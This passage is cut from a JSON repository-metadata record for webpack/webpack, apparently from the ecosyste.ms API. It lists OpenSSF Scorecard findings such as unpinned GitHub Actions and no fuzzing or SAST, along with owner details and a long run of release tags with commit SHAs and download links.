https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":